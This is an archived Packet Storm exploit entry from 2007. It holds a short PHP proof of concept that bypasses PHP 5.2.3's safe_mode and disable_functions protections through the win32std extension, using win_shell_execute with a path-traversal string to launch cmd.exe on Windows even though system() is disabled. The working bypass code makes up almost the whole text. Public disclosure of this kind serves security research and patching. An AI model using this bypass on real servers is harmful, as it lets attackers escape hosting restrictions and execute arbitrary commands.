php523-win32std.txt

2007-07-25T00:00:00
ID PACKETSTORM:58016
Type packetstorm
Reporter shinnai
Modified 2007-07-25T00:00:00

Description

                                        
                                            `<?php  
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass  
  
//author: shinnai  
//mail: shinnai[at]autistici[dot]org  
//site: http://shinnai.altervista.org  
  
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache  
  
//Thanks to rgod for all his precious advises :)  
  
//I set php.ini in this way:  
//safe_mode = On  
//disable_functions = system  
//if you launch the exploit from the cli, cmd.exe will be wxecuted  
//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager  
  
if (!extension_loaded("win32std")) die("win32std extension required!");  
system("cmd.exe"); //just to be sure that protections work well  
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");  
?>  
  
`